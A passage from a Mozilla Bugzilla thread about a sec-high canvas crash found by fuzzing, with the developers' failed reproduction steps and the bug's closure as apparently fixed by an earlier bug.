The code for the fuzzPriv extension can be found on this repo: https://github.com/MozillaSecurity/domfuzz/blob/master/dom/extension/content/fuzzPriv.js You can probably ping
|
|
||
Updated•7 years ago
|
|
|
||
Comment 6•7 years ago
|
||
I can't reproduce this in a current Nightly. This bug may have been fixed by bug 1371259. The symptoms certainly look like bug 1371259: The canvas is being freed while a call to a method on it is still on the stack. Can you please check whether the bug still exists? This bug was filed late in the evening on July 10 against 54 release. Bug 1371259 was landed on central a few hours before that and was then backported to 55 and esr52. Here's how I tried to reproduce it: 1. I clone the git repo https://github.com/MozillaSecurity/domfuzz 2. I added <em:multiprocessCompatible>true</em:multiprocessCompatible> to /dom/extension/install.rdf 3. I executed "make" in /dom/extension 4. I created a new profile in Nightly and set xpinstall.signatures.required to false. 5. I dragged the domFuzzLite3.xpi file that "make" generated into Nightly and installed the add-on. 6. I loaded the testcase from a local file in an e10s tab. 7. I allowed popups for that location. 8. I reloaded the page. It didn't crash. This was on Mac.
Sec-high, tracked for 57.
|
|
||
Comment 8•7 years ago
|
||
I sent a message to the reporter to ask him if he was still able to reproduce it.
Apologies for missing this and thanks for you e-mail Stephanie. I tried to reproduce it on the latest stable release and can't reproduce it anymore. Maybe this is related to another bug I reported which also stopped reproducing around the same time and which shows some similarities in the testcase. See https://bugzilla.mozilla.org/show_bug.cgi?id=1380292#c8
Flags: needinfo?(nils)
|
|
||
Comment 10•7 years ago
|
||
Thanks! Then I think this was fixed by bug 1371259.
|
||
Updated•7 years ago
|
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → WORKSFORME
|
||
Comment 11•7 years ago
|
||
Per comment #10, mark 56/57 fixed.
|
||
Comment 12•7 years ago
|
||
Likewise esr52.
|
||
Updated•7 years ago
|
Whiteboard: [fixed by bug 1371259?] → [fixed by bug 1371259?][adv-main56-]
|
|
||
Updated•7 years ago
|
Flags: sec-bounty? → sec-bounty-
|
|
||
Updated•6 years ago
|
Group: gfx-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•